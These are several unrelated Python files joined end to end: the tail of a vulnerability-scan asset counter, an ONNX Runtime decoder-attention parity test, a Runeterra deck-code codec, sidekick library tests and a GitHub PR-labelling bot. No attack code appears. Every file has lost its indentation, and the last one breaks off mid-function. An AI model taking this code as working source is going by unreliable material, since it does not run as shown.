time_lapse = time.perf_counter() - start_time
if (time_lapse) < 1.0:
print(f"\nExceeded 5 API calls per second.")
time.sleep(1)
if asset_cntr % 25 == 0:
time_left_secs = (asset_count - asset_cntr) / (time_lapse / 5)
print(f"Processed {asset_cntr} assets and {vuln_cntr} vulns. ({time_left_secs:0.1f}s {time_left_secs/60:0.1f}m) \r", end='')
start_time = time.perf_counter()
page_num += 1
total_time_secs = time.perf_counter() - acc_start_time
avfp.close()
print(f"Processed {asset_cntr} assets and {vuln_cntr} vulns in {total_time_secs:0.1f}s ({total_time_secs/60:0.1f}m) ")
|
# --------------------------------------------------------------------------
# Copyright 2020 The HuggingFace Inc. team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# -------------------------------------------------------------------------
import math
import numpy
import torch
from torch import Tensor, nn
from torch.nn import functional as F
from typing import Dict, List, Optional, Tuple
import os
torch.manual_seed(0)
"""
This is an example of export bart decoder attention with huggingface v3.5.1
def my_bart_attention_forward(
self,
query,
key: Tensor,
key_padding_mask: Optional[Tensor],
layer_state: Optional[List[Tensor]],
attn_mask: Optional[Tensor] = None,
output_attentions: bool=False,
use_past=torch.tensor(False),
):
static_kv: bool = self.encoder_decoder_attention
q_weight = self.q_proj.weight.transpose(0,1)
q_weight = q_weight.reshape(self.embed_dim, self.embed_dim)
kv_weight = torch.stack((self.k_v_proj.k_proj.weight.transpose(0,1), self.k_v_proj.v_proj.weight.transpose(0,1)), dim=1)
kv_weight = kv_weight.reshape(self.embed_dim, 2 * self.embed_dim)
bias = torch.stack((self.q_proj.bias, self.k_v_proj.k_proj.bias, self.k_v_proj.v_proj.bias), dim=0)
bias = bias.reshape(3 * self.embed_dim)
self_p_k, self_p_v, enc_dec_p_k, enc_dec_p_v = layer_state
if static_kv:
key_cache, value_cache = enc_dec_p_k, enc_dec_p_v
else:
key_cache, value_cache = self_p_k, self_p_v
if not static_kv:
key_padding_mask = torch.tensor(False)
attn_output, new_key_cache, new_value_cache = torch.ops.onnxruntime.DecoderAttention(
query,
key,
q_weight,
kv_weight,
bias,
key_padding_mask,
key_cache,
value_cache,
torch.tensor(static_kv), #static_kv
use_past, #use_past
torch.tensor(True), #has_layer_state
torch.tensor(static_kv), #has_key_padding_mask
self.num_heads)
if not use_past:
if self.encoder_decoder_attention:
layer_state[2] = new_key_cache
layer_state[3] = new_value_cache
else:
layer_state[0] = new_key_cache
layer_state[1] = new_value_cache
else:
if not self.encoder_decoder_attention:
layer_state[0] = new_key_cache
layer_state[1] = new_value_cache
attn_output = self.out_proj(attn_output)
return attn_output, None, layer_state
"""
class Config:
batch_size = 0
sequence_length = 0
kv_sequence_length = 0
num_heads = 0
head_size = 0
embed_dim = 0
def __init__(self, b, s, s2, n, h):
self.batch_size = b
self.sequence_length = s
self.kv_sequence_length = s2
self.num_heads = n
self.head_size = h
self.embed_dim = self.num_heads * self.head_size
class AttentionProjection(nn.Module):
def __init__(self, num_heads, head_dim, embed_dim, bias=True):
super().__init__()
self.num_heads = num_heads
self.head_dim = head_dim
self.k_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
self.v_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
def shape_state(self, state, batch_size):
return state.view(batch_size * self.num_heads, -1, self.head_dim)
def shape_proj(self, proj, batch_size):
return proj.view(-1, batch_size * self.num_heads, self.head_dim).transpose(0, 1)
def forward(
self,
query,
key,
layer_state: Optional[List[Tensor]],
encoder_decoder_attention: bool,
use_past=torch.tensor(False),
):
bsz = torch._shape_as_tensor(query)[1]
if layer_state is None or not use_past:
if not encoder_decoder_attention:
k = self.k_proj(query)
v = self.v_proj(query)
k = self.shape_proj(k, bsz)
v = self.shape_proj(v, bsz)
else:
k = self.k_proj(key)
v = self.v_proj(key)
k = self.shape_proj(k, bsz)
v = self.shape_proj(v, bsz)
else:
self_p_k, self_p_v, enc_dec_p_k, enc_dec_p_v = layer_state
if not encoder_decoder_attention:
k = self.k_proj(query)
v = self.v_proj(query)
k = self.shape_proj(k, bsz)
v = self.shape_proj(v, bsz)
k = torch.cat([self.shape_state(self_p_k, bsz), k], dim=1)
v = torch.cat([self.shape_state(self_p_v, bsz), v], dim=1)
else:
k = self.shape_state(enc_dec_p_k, bsz)
v = self.shape_state(enc_dec_p_v, bsz)
return k, v
class AttentionForONNX(nn.Module):
"""Multi-headed attention from 'Attention Is All You Need' paper"""
def __init__(
self,
embed_dim,
num_heads,
dropout=0.0,
bias=True,
encoder_decoder_attention=False, # otherwise self_attention
):
super().__init__()
self.embed_dim = embed_dim
self.num_heads = num_heads
self.dropout = dropout
self.head_dim = embed_dim // num_heads
assert self.head_dim * num_heads == self.embed_dim, "embed_dim must be divisible by num_heads"
self.scaling = self.head_dim ** -0.5
self.encoder_decoder_attention = encoder_decoder_attention
self.k_v_proj = torch.jit.script(AttentionProjection(num_heads, self.head_dim, embed_dim, bias))
self.q_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
self.out_proj = nn.Linear(embed_dim, embed_dim, bias=bias)
self.cache_key = "encoder_decoder" if self.encoder_decoder_attention else "self"
def _shape(self, tensor, seq_len, bsz):
return tensor.contiguous().view(seq_len, bsz * self.num_heads, self.head_dim).transpose(0, 1)
def forward(
self,
query,
key: Tensor,
key_padding_mask: Optional[Tensor] = None,
layer_state: Optional[List[Tensor]] = None,
attn_mask: Optional[Tensor] = None,
output_attentions: bool=False,
use_past=torch.tensor(False),
has_key_padding_mask: bool=False
) -> Tuple[Tensor, Optional[Tensor]]:
"""Input shape: Time(SeqLen) x Batch x Channel"""
static_kv: bool = self.encoder_decoder_attention
tgt_len, bsz, embed_dim = query.size()
# get here for encoder decoder cause of static_kv
k, v = self.k_v_proj(query, key, layer_state, self.encoder_decoder_attention, use_past)
q = self.q_proj(query) * self.scaling
q = self._shape(q, tgt_len, bsz)
# Update cache
if layer_state is not None:
cached_shape = (bsz, self.num_heads, -1, self.head_dim) # bsz must be first for reorder_cache
if static_kv:
# cross-attn
new_key_cache = k.view(*cached_shape)
new_value_cache = v.view(*cached_shape)
else:
# self-attn
new_key_cache = k.view(*cached_shape)
new_value_cache = v.view(*cached_shape)
src_len = k.size(1)
assert key_padding_mask is None or key_padding_mask.shape == (bsz, src_len)
attn_weights = torch.bmm(q, k.transpose(1, 2))
assert attn_weights.size() == (bsz * self.num_heads, tgt_len, src_len)
if has_key_padding_mask: # don't attend to padding symbols
attn_weights = attn_weights.view(bsz, self.num_heads, tgt_len, src_len)
reshaped = key_padding_mask.unsqueeze(1).unsqueeze(2)
attn_weights = attn_weights.masked_fill(reshaped, float("-inf"))
attn_weights = attn_weights.view(bsz * self.num_heads, tgt_len, src_len)
attn_weights = F.softmax(attn_weights, dim=-1)
attn_probs = attn_weights
assert v is not None
attn_output = torch.bmm(attn_probs, v)
assert attn_output.size() == (bsz * self.num_heads, tgt_len, self.head_dim)
attn_output = attn_output.transpose(0, 1).contiguous().view(tgt_len, bsz, embed_dim)
attn_output = self.out_proj(attn_output)
return attn_output, new_key_cache, new_value_cache
def ORT_forward(
self,
query,
key: Tensor,
key_padding_mask: Optional[Tensor] = None,
layer_state: Optional[List[Tensor]] = None,
attn_mask: Optional[Tensor] = None,
output_attentions: bool=False,
use_past=torch.tensor(False),
has_key_padding_mask: bool=False
) -> Tuple[Tensor, Optional[Tensor]]:
"""Input shape: Time(SeqLen) x Batch x Channel"""
# For readability
static_kv = True if self.encoder_decoder_attention else False
has_layer_state = True if layer_state is not None else False
use_past_cache = True if use_past else False
q_weight = self.q_proj.weight.transpose(0,1)
q_weight = q_weight.reshape(self.embed_dim, self.embed_dim)
kv_weight = torch.stack((self.k_v_proj.k_proj.weight.transpose(0,1), self.k_v_proj.v_proj.weight.transpose(0,1)), dim=1)
kv_weight = kv_weight.reshape(self.embed_dim, 2 * self.embed_dim)
bias = torch.stack((self.q_proj.bias, self.k_v_proj.k_proj.bias, self.k_v_proj.v_proj.bias), dim=0)
bias = bias.reshape(3 * self.embed_dim)
onnx_model_str = create_decoder_attention_graph(query, key, q_weight, kv_weight, bias, self.num_heads, static_kv, use_past_cache, has_layer_state, has_key_padding_mask)
self_p_k, self_p_v, enc_dec_p_k, enc_dec_p_v = layer_state
if self.encoder_decoder_attention:
key_cache, value_cache = enc_dec_p_k, enc_dec_p_v
else:
key_cache, value_cache = self_p_k, self_p_v
ort_inputs = {
'query': numpy.ascontiguousarray(query.cpu().numpy()),
'key': numpy.ascontiguousarray(key.cpu().numpy()),
'key_padding_mask': numpy.ascontiguousarray(key_padding_mask.cpu().numpy()),
'key_cache': numpy.ascontiguousarray(key_cache.detach().cpu().numpy()),
'value_cache': numpy.ascontiguousarray(value_cache.detach().cpu().numpy())
}
from onnxruntime import SessionOptions, InferenceSession
sess_options = SessionOptions()
ort_session = InferenceSession(onnx_model_str, sess_options, providers=['CUDAExecutionProvider'])
ort_output = ort_session.run(None, ort_inputs)
output, new_key_cache, new_value_cache = ort_output
output = torch.tensor(output)
attn_output = self.out_proj(output)
return attn_output, torch.tensor(new_key_cache), torch.tensor(new_value_cache)
def create_decoder_attention_graph(query, key, q_weight, kv_weight, bias, num_heads_, static_kv, use_past, has_layer_state, has_key_padding_mask):
from onnx import helper, TensorProto
S, B, NH = query.size()
S2 = key.size()[0]
N = num_heads_
H = int(NH / N)
nodes = [
helper.make_node("DecoderAttention",
["query", "key", "q_weight", "kv_weight", "bias", "key_padding_mask", "key_cache", "value_cache", "static_kv", "use_past", "has_layer_state", "has_key_padding_mask"],
["output", "new_key_cache", "new_value_cache"],
"DecoderAttention_0",
num_heads=num_heads_,
domain="com.microsoft"),
]
initializers = [
helper.make_tensor('q_weight', TensorProto.FLOAT, [NH, NH],
q_weight.flatten().tolist()),
helper.make_tensor('kv_weight', TensorProto.FLOAT, [NH, 2 * NH],
kv_weight.flatten().tolist()),
helper.make_tensor('bias', TensorProto.FLOAT, [3 * NH],
bias.flatten().tolist()),
helper.make_tensor('static_kv', TensorProto.BOOL, [1],
[static_kv]),
helper.make_tensor('use_past', TensorProto.BOOL, [1],
[use_past]),
helper.make_tensor('has_layer_state', TensorProto.BOOL, [1],
[has_layer_state]),
helper.make_tensor('has_key_padding_mask', TensorProto.BOOL, [1],
[has_key_padding_mask]),
]
graph = helper.make_graph(nodes, "DecoderAttention_Graph", [
helper.make_tensor_value_info('query', TensorProto.FLOAT, [S, B, NH]),
helper.make_tensor_value_info('key', TensorProto.FLOAT, [S2, B, NH]),
helper.make_tensor_value_info('key_padding_mask', TensorProto.BOOL, [B, "mask_len"]),
helper.make_tensor_value_info('key_cache', TensorProto.FLOAT, [B, N, "cache_len", H]),
helper.make_tensor_value_info('value_cache', TensorProto.FLOAT, [B, N, "cache_len", H]),
], [
helper.make_tensor_value_info('output', TensorProto.FLOAT, [S, B, NH]),
helper.make_tensor_value_info('new_key_cache', TensorProto.FLOAT, [B, N, "new_cache_len", H]),
helper.make_tensor_value_info('new_value_cache', TensorProto.FLOAT, [B, N, "new_cache_len", H]),
], initializers)
model = helper.make_model(graph)
return model.SerializeToString()
def create_inputs(config: Config, has_layer_state: bool, use_past: bool, encoder_decoder_attention:bool):
query = torch.normal(mean=0.0,
std=0.1,
size=(config.sequence_length,
config.batch_size,
config.embed_dim)
).to(torch.float32)
key = torch.normal(mean=0.0,
std=0.1,
size=(config.kv_sequence_length,
config.batch_size,
config.embed_dim)
).to(torch.float32)
key_length = None
if not has_layer_state or not use_past:
if not encoder_decoder_attention:
key_length = config.sequence_length
else:
key_length = config.kv_sequence_length
else:
if not encoder_decoder_attention:
key_length = config.sequence_length + config.kv_sequence_length
else:
key_length = config.kv_sequence_length
key_padding_mask = torch.normal(mean=0.0,
std=0.1,
size=(config.batch_size,
key_length)
) > 0
# The following line ensure not all the mask are true
key_padding_mask[0][0] = False
cache = torch.normal(mean=0.0,
std=0.1,
size=(config.batch_size,
config.num_heads,
config.kv_sequence_length,
config.head_size)
).to(torch.float32)
layer_state = [cache, cache, cache, cache]
return query, key, key_padding_mask, layer_state, torch.tensor(use_past)
def parity_check(config, has_layer_state, use_past, static_kv, has_key_padding_mask, rtol = 1e-4, atol = 1e-4):
query, key, key_padding_mask, layer_state, use_past = create_inputs(config,
has_layer_state,
use_past,
static_kv)
attn = AttentionForONNX(config.embed_dim,
config.num_heads,
encoder_decoder_attention = static_kv)
attn_output, new_key_cache, new_value_cache = attn.forward(query, key, key_padding_mask, layer_state, None, False, use_past, has_key_padding_mask)
attn_output_ort, new_key_cache_ort, new_value_cache_ort = attn.ORT_forward(query, key, key_padding_mask, layer_state, None, False, use_past, has_key_padding_mask)
attn_output_ort_1, _, _ = attn.ORT_forward(query, key, key_padding_mask, layer_state, None, False, use_past, has_key_padding_mask)
print(" B:", config.batch_size,
" S:", config.sequence_length,
" S*:", config.kv_sequence_length,
" h:", config.embed_dim,
" has_layer_state:", has_layer_state,
" use_past:", use_past,
" static_kv:", static_kv,
" has_key_padding_mask:", has_key_padding_mask,
"[attn_output, randomness, key, value] parity:",
numpy.allclose(attn_output.detach().numpy(), attn_output_ort.detach().numpy(), rtol = rtol, atol = atol, equal_nan = True),
numpy.allclose(attn_output_ort_1.detach().numpy(), attn_output_ort.detach().numpy(), rtol = rtol, atol = atol, equal_nan = True),
numpy.allclose(new_key_cache.detach().numpy(), new_key_cache_ort.detach().numpy(), rtol = rtol, atol = atol, equal_nan = True),
numpy.allclose(new_value_cache.detach().numpy(), new_value_cache_ort.detach().numpy(), rtol = rtol, atol = atol, equal_nan = True))
if __name__ == '__main__':
for b in [1, 32, 128]:
for s in [1, 2, 128]:
for s2 in [1, 64, 256]:
for n in [8]:
for h in [64]:
config = Config(b, s, s2, n, h)
parity_check(config, has_layer_state = True, use_past = True, static_kv = True, has_key_padding_mask = False)
parity_check(config, has_layer_state = True, use_past = True, static_kv = False, has_key_padding_mask = False)
parity_check(config, has_layer_state = True, use_past = False, static_kv = True, has_key_padding_mask = False)
parity_check(config, has_layer_state = True, use_past = False, static_kv = False, has_key_padding_mask = False)
parity_check(config, has_layer_state = True, use_past = True, static_kv = True, has_key_padding_mask = True)
parity_check(config, has_layer_state = True, use_past = True, static_kv = False, has_key_padding_mask = True)
parity_check(config, has_layer_state = True, use_past = False, static_kv = True, has_key_padding_mask = True)
parity_check(config, has_layer_state = True, use_past = False, static_kv = False, has_key_padding_mask = True) |
# Credit to @stelar7, this python implementation is a port of his original javascript implementation
from base64 import b32decode, b32encode
from io import BytesIO
MAX_KNOWN_VERSION = 20
class Base32:
@staticmethod
def decode(b32string):
s = Base32.add_padding(b32string)
return b32decode(s)
@staticmethod
def encode(bytes_list):
encoded_string = b32encode(bytes(bytes_list))
encoded_string = str(encoded_string, "utf-8").strip("=")
return encoded_string
# python's builtin decoder is strict with padding
@staticmethod
def add_padding(b32String):
length = len(b32String)
padding = 0
if (length % 8 > 0):
padding = 8 - (length % 8)
b32String += "=" * padding
return b32String
faction_code_to_id = {
"DE": 0,
"FR": 1,
"IO": 2,
"NX": 3,
"PZ": 4,
"SI": 5,
"BW": 6,
"SH": 7,
"BC": 10,
"MT": 9
}
id_to_faction_code = {
0: "DE",
1: "FR",
2: "IO",
3: "NX",
4: "PZ",
5: "SI",
6: "BW",
7: "SH",
10: "BC",
9: "MT"
}
class DeckCode:
@staticmethod
def encode_deck(deck):
result = [17]
cards_3 = []
cards_2 = []
cards_1 = []
cards_other = []
#remove non-collectable and created deck code
deck = DeckCode.remove_invalid_cards(deck)
if not DeckCode.is_valid_card_codes_and_count(deck):
raise Exception("Deck contains invalid card codes")
else:
for card, count in deck.items():
if count == 3:
cards_3.append(card)
elif count == 2:
cards_2.append(card)
elif count == 1:
cards_1.append(card)
else:
cards_other.append((card, count))
grouped_cards_3 = DeckCode.group_by_faction(cards_3)
grouped_cards_2 = DeckCode.group_by_faction(cards_2)
grouped_cards_1 = DeckCode.group_by_faction(cards_1)
grouped_cards_3 = DeckCode.sort_card_groups(grouped_cards_3)
grouped_cards_2 = DeckCode.sort_card_groups(grouped_cards_2)
grouped_cards_1 = DeckCode.sort_card_groups(grouped_cards_1)
cards_other = sorted(cards_other)
# encode
result = [*result, *VarIntTransformer.encodeGroupOf(grouped_cards_3)]
result = [*result, *VarIntTransformer.encodeGroupOf(grouped_cards_2)]
result = [*result, *VarIntTransformer.encodeGroupOf(grouped_cards_1)]
result = [*result, *VarIntTransformer.encodeNOfs(cards_other)]
return Base32.encode(result)
@staticmethod
def group_by_faction(card_list):
new_list = []
while len(card_list) > 0:
card = card_list.pop(0)
set_num, faction, _ = DeckCode.parse_card_code(card)
faction_set = []
faction_set.append(card)
temp_list = card_list[:]
for card in temp_list:
current_set_num, current_faction, _ = DeckCode.parse_card_code(
card)
if current_set_num == set_num and current_faction == faction:
faction_set.append(card)
card_list.remove(card)
faction_set.sort()
new_list.append(faction_set)
return new_list
@staticmethod
def sort_card_groups(card_groups):
s = sorted(card_groups, key=lambda x: len(x))
return s
@staticmethod
def parse_card_code(card_code):
set = card_code[:2]
faction = card_code[2:4]
card_id = card_code[4:]
return set, faction, card_id
@staticmethod
def is_valid_card_codes_and_count(deck):
for card, count in deck.items():
code = card
if len(code) != 7:
print(f"deck code length is {len(code)}")
return False
# check set code is numeric
for char in code[:2]:
if not char.isdigit():
print(f"code is not digit: {char}")
return False
faction = faction_code_to_id.get(code[2:4], -1)
if faction < 0:
print(f"faction code not in faction code list: {code[2:4]}")
return False
for char in code[4:]:
if not char.isdigit():
print(f"card number contains non digit: {char}")
return False
if count < 1:
print("less than one card: {count}")
return False
return True
@staticmethod
def remove_invalid_cards(deck):
# When you remove continue, it will not print error messages
newDeck = deck.copy()
for card, count in deck.items():
code = card
if len(code) != 7:
print(f"remove_invalid_cards deck code length is {len(code)}")
del newDeck[card]
continue
# check set code is numeric
for char in code[:2]:
if not char.isdigit():
print(f"remove_invalid_cards code is not digit: {char}")
del newDeck[card]
continue
faction = faction_code_to_id.get(code[2:4], -1)
if faction < 0:
print(f"remove_invalid_cards faction code not in faction code list: {code[2:4]}")
del newDeck[card]
continue
for char in code[4:]:
if not char.isdigit():
print(f"remove_invalid_cards card number contains non digit: {char}")
del newDeck[card]
continue
if count < 1:
print("remove_invalid_cards less than one card: {count}")
del newDeck[card]
continue
return newDeck
@staticmethod
def decode_deck(string):
result = {}
data = Base32.decode(string)
byte_list = BytesIO(data)
version = VarIntTransformer.popVarInt(byte_list)
if version > MAX_KNOWN_VERSION:
raise ValueError("Please update to the latest version of twisted_fate")
for i in range(3, 0, -1):
numGroupOfs = VarIntTransformer.popVarInt(byte_list)
for __ in range(numGroupOfs):
numOfsInThisGroup = VarIntTransformer.popVarInt(byte_list)
setNum = VarIntTransformer.popVarInt(byte_list)
faction = VarIntTransformer.popVarInt(byte_list)
for ___ in range(numOfsInThisGroup):
card = VarIntTransformer.popVarInt(byte_list)
setString = str(setNum).zfill(2)
factionString = id_to_faction_code[faction]
cardString = str(card).zfill(3)
card_code = setString + factionString + cardString
result[card_code] = i
while len(bytearray(byte_list)) > 0:
fpc = VarIntTransformer.popVarInt(byte_list)
fps = VarIntTransformer.popVarInt(byte_list)
fpf = VarIntTransformer.popVarInt(byte_list)
fpn = VarIntTransformer.popVarInt(byte_list)
fpss = str(fps).zfill(2)
fpfs = id_to_faction_code[fpf]
fpns = str(fpn).zfill(3)
card_code = fpss + fpfs + fpns
result[card_code] = fpc
return result
class VarIntTransformer:
@staticmethod
def popVarInt(stream):
#data = BytesIO(_bytes)
shift = 0
result = 0
while True:
c = stream.read(1)
if c == b"" or c == "":
raise EOFError("Unexpected EOF while reading varint")
i = ord(c)
result |= (i & 0x7f) << shift
shift += 7
if not (i & 0x80):
break
return result
@staticmethod
def getVarInt(value):
value = int(value)
AllButMSB = 0x7F
JustMSB = 0x80
buff = [10]
current_index = 0
if value == 0:
return [0]
while value != 0:
byte_val = value & AllButMSB
value >>= 7
if value != 0:
byte_val |= JustMSB
try:
buff[current_index] = byte_val
except IndexError:
buff.append(byte_val)
current_index += 1
return buff[:current_index]
@staticmethod
def encodeNOfs(nOfs):
_bytes = []
for card, count in nOfs:
_bytes = [*_bytes, *VarIntTransformer.getVarInt(count)]
setNum, factionCode, cardNum = DeckCode.parse_card_code(card)
factionNum = faction_code_to_id[factionCode]
_bytes = [*_bytes, *VarIntTransformer.getVarInt(setNum)]
_bytes = [*_bytes, *VarIntTransformer.getVarInt(factionNum)]
_bytes = [*_bytes, *VarIntTransformer.getVarInt(cardNum)]
return _bytes
@staticmethod
def encodeGroupOf(groupOf):
_bytes = []
_bytes = [*_bytes, *VarIntTransformer.getVarInt(len(groupOf))]
for cardList in groupOf:
_bytes = [*_bytes, *VarIntTransformer.getVarInt(len(cardList))]
current_card_code = cardList[0]
current_set_num, current_faction_code, _ = DeckCode.parse_card_code(
current_card_code)
current_faction_num = faction_code_to_id[current_faction_code]
_bytes = [*_bytes, *VarIntTransformer.getVarInt(current_set_num)]
_bytes = [
*_bytes, *VarIntTransformer.getVarInt(current_faction_num)
]
for card in cardList:
sequenceNumber = card[4:]
_bytes = [
*_bytes, *VarIntTransformer.getVarInt(sequenceNumber)
]
return _bytes
|
import operator as op
import pytest
import sidekick.api as sk
from sidekick import X
from sidekick.seq.testing import VALUE, LL
class TestBasic:
def test_fail_with_empty_lists(self, empty):
fail = [sk.uncons, sk.first, sk.second, sk.last, sk.nth(0), sk.nth(1)]
for func in fail:
with pytest.raises(ValueError):
print("not failed:", func, func(empty()))
def test_succeed_with_empty_lists(self, empty):
success = {
sk.cons(1): LL(1),
sk.uncons(default=VALUE): (VALUE, LL()),
sk.first(default=VALUE): VALUE,
sk.second(default=VALUE): VALUE,
sk.last(default=VALUE): VALUE,
sk.nth(0, default=VALUE): VALUE,
sk.nth(5, default=VALUE): VALUE,
sk.only(default=VALUE): VALUE,
sk.last(n=2, default=None): (None, None),
sk.is_empty: True,
sk.length: 0,
}
for f, v in success.items():
assert f(empty()) == v
def test_succeed_with_seq_of_numbers(self, nums):
success = {
sk.cons(0): LL(0, 1, 2, 3, 4, 5),
sk.uncons: (1, LL(2, 3, 4, 5)),
sk.first: 1,
sk.second: 2,
sk.last: 5,
sk.nth(0): 1,
sk.nth(2): 3,
sk.nth(5, default=VALUE): VALUE,
sk.last(n=2): (4, 5),
sk.is_empty: False,
sk.length: 5,
sk.length(limit=2): 2,
}
for f, v in success.items():
assert f(nums()) == v
def test_fail_seq_of_numbers(self, nums):
fail = [sk.nth(5), sk.nth(10)]
for func in fail:
with pytest.raises(ValueError):
v = func(nums())
print("not failed:", func, v)
def test_only(self):
assert sk.only([42]) == 42
assert sk.only([], default=42) == 42
with pytest.raises(ValueError):
sk.only([])
with pytest.raises(ValueError):
sk.only([1, 2])
class TestCreation:
def test_unfold(self):
assert sk.unfold(lambda x: None if x > 10 else (2 * x, x), 1) == LL(1, 2, 4, 8)
def test_nums(self):
assert sk.nums() == LL(0, 1, 2, 3, 4, ...)
assert sk.nums(1) == LL(1, 2, 3, 4, 5, ...)
assert sk.nums(1, ...) == LL(1, 2, 3, 4, 5, ...)
assert sk.nums(1, 2, ...) == LL(1, 2, 3, 4, 5, ...)
assert sk.nums(1, 3, ...) == LL(1, 3, 5, 7, 9, ...)
assert sk.nums(1, 2, 3, 5, ...) == LL(1, 2, 3, 5, 7, 9, ...)
def test_iterate(self):
# Test special cases for 0, 1, 2, 3, and more past values
fn = lambda *args: sum(args)
assert sk.iterate((X + 1), 1) == LL(1, 2, 3, ...)
assert sk.iterate(fn, 1, 1) == LL(1, 1, 2, 3, 5, 8, ...)
assert sk.iterate(fn, 1, 3) == LL(1, 3, 4, 7, 11, ...)
assert sk.iterate(fn, 1, 1, 1) == LL(1, 1, 1, 3, 5, 9, 17, ...)
assert sk.iterate(fn, 1, 1, 1, 1) == LL(1, 1, 1, 1, 4, 7, 13, 25, ...)
assert sk.iterate(op.mul, 1, index=1) == LL(1, 1, 2, 6, 24, 120, ...)
assert sk.iterate(fn, 1, index=sk.nums()) == LL(1, 1, 2, 4, 7, 11, 16, ...)
class TestHypothesis:
FN_PRED_SEQ = {}
FN_SELECTOR = {}
def test_functions_that_do_not_change_size_of_iterables(self):
...
def test_functions_that_filter_iterables(self):
filters = [
sk.filter,
sk.remove,
sk.dedupe,
sk.unique,
sk.take,
sk.rtake,
sk.drop,
sk.rdrop,
]
def test_functions_that_filter_and_transform_iterables(self):
...
|
import os
import aiohttp
from aiohttp import web
from gidgethub import aiohttp as gh_aiohttp
from gidgethub import routing
from gidgethub import sansio
router = routing.Router()
routes = web.RouteTableDef()
BOT_NAME = "marvin-mk2"
# secrets and configurations configured through the environment
WEBHOOK_SECRET = os.environ.get("WEBHOOK_SECRET")
GH_OAUTH_TOKEN = os.environ.get("GH_TOKEN")
# map commands to mutually exclusive labels
ISSUE_STATE_COMMANDS = {
"needs review": "needs_review",
"needs work": "needs_work",
"needs merge": "needs_merge",
}
GREETING_FOOTER = f"""
Once a reviewer has looked at this, they can either
- request changes and instruct me to switch the state back (@{BOT_NAME} needs work)
- merge the PR if it looks good and they have the appropriate permission
- switch the state to `needs_merge` (@{BOT_NAME} needs merge), which allows reviewers with merge permission to focus their reviews
If anything could be improved, do not hesitate to give [feedback](https://github.com/timokau/marvin-mk2/issues).
""".rstrip()
GREETING_WORK = (
f"""
Hi! I'm an experimental bot. My goal is to guide this PR through its stages, hopefully ending with a merge.
I have initialized the PR in the `needs_work` state. This indicates that the PR is not finished yet or that there are outstanding change requests. If you think the PR is good as-is, you can tell me to switch the state as follows:
@{BOT_NAME} needs review
This will change the state to `needs_review`, which makes it easily discoverable by reviewers.
""".strip()
+ GREETING_FOOTER
)
GREETING_REVIEW = (
f"""
Hi! I'm an experimental bot. My goal is to guide this PR through its stages, hopefully ending with a merge.
I have initialized the PR in the `needs_review` state. This indicates that you consider this PR good to go and makes it easily discoverable by reviewers.
""".strip()
+ GREETING_FOOTER
)
UNKNOWN_COMMAND_TEXT = f"""
Sorry, I can't help you. Is there maybe a typo in your command?
""".strip()
# Unfortunately its not possible to directly listen for mentions
# https://github.com/dear-github/dear-github/issues/294
def find_commands(comment_text):
r"""Filters a comment for commands.
>>> find_commands("This is a comment without a command.")
[]
>>> find_commands("This includes a command, but with the wrong mention.\n@marvin-mk3 command")
[]
>>> find_commands("This includes a proper command.\n@marvin-mk2 command with multiple words")
['command with multiple words']
>>> find_commands("@marvin-mk2 @marvin-mk2 test\n@marvin-mk3 asdf\n@marvin-mk2 another ")
['@marvin-mk2 test', 'another']
"""
commands = []
for line in comment_text.splitlines():
prefix = f"@{BOT_NAME}"
if line.startswith(f"@{BOT_NAME}"):
commands.append(line[len(prefix) :].strip())
return commands
async def clear_state(issue, gh):
"""Clears the state tag of an issue"""
labels = issue["labels"]
label_names = {label["name"] for label in labels}
# should never be more than one, but better to make it a set anyway
state_labels = label_names.intersection(ISSUE_STATE_COMMANDS.values())
for label in state_labels:
await gh.delete(issue["url"] + "/labels/" + label)
async def handle_new_pr(pull_request, gh):
"""React to new issues"""
comment_text = pull_request["body"]
# If pull_request actually is a pull_request, we have to query issue_url.
# If its an issue, we have to use "url".
issue_url = pull_request.get("issue_url", pull_request["url"])
add_labels_url = issue_url + "/labels"
# Only handle one command for now, since a command can modify the issue and
# we'd need to keep track of that.
for command in find_commands(comment_text)[:1]:
if command == "needs work":
await gh.post(
add_labels_url, data={"labels": ["marvin"]},
)
await gh.post(
issue_url + "/labels",
data={"labels": [ISSUE_STATE_COMMANDS["needs work"]]},
)
await gh.post(pull_request["comments_url"], data={"body": GREETING_WORK})
elif command == "needs review":
await gh.post(
add_labels_url, data={"labels": ["marvin"]},
)
await gh.post(
add_labels_url,
data={"labels": [ISSUE_STATE_COMMANDS["needs review"]]},
)
await gh.post(pull_request["comments_url"], data={"body": GREETING_REVIEW})
else:
await gh.post(
pull_request["comments_url"], data={"body": UNKNOWN_COMMAND_TEXT}
)
async def handle_comment(comment, issue, gh):
"""React to issue comments"""
comment_text = comment["body"]
comment_author_login = comment["user"]["login"]
if comment_author_login == BOT_NAME:
return
# check opt-in
if "marvin" not in {label["name"] for label in issue["labels"]}:
return
# Only handle one command for now, since a command can modify the issue and
# we'd need to keep track of that.
for command in find_commands(comment_text)[:1]:
if command == "echo":
comment_text = comment["body"]
reply_text = f"Echo!\n{comment_text}"
await gh.post(issue["comments_url"], data={"body": reply_text})
elif command == "agree with me":
# https://developer.github.com/v3/reactions/#reaction-types For
# some reason reactions have been in "beta" since 2016. We need to
# opt in with the accept header.
# https://developer.github.com/changes/2016-05-12-reactions-api-preview/
await gh.post(
comment["url"] + "/reactions",
data={"content": "+1"},
accept="application/vnd.github.squirrel-girl-preview+json",
)
elif command in ISSUE_STATE_COMMANDS:
await clear_state(issue, gh)
await gh.post(
issue["url"] + "/labels",
data={"labels": [ISSUE_STATE_COMMANDS[command]]},
)
else:
await gh.post(issue["comments_url"], data={"body": UNKNOWN_COMMAND_TEXT})
# Work on issues too for easier testing.
@router.register("issues", action="opened")
async def issue_open_event(event, gh, *args, **kwargs):
await handle_new_pr(event.data["issue"], gh)
@router.register("issue_comment", action="created")
async def issue_comment_event(event, gh, *args, **kwargs):
await handle_comment(event.data["comment"], event.data["issue"], gh)
@router.register("pull_request_review_comment", action="created")
async def pull_request_review_comment_event(event, gh, *args, **kwargs):
await handle_comment(event.data["comment"], event.data["pull_request"], gh)
@router.register("pull_request", action="opened")
async def pull_request_open_event(event, gh, *args, **kwargs):
await handle_new_pr(event.data["pull_request"], gh)
@routes.post("/")
async def main(request):
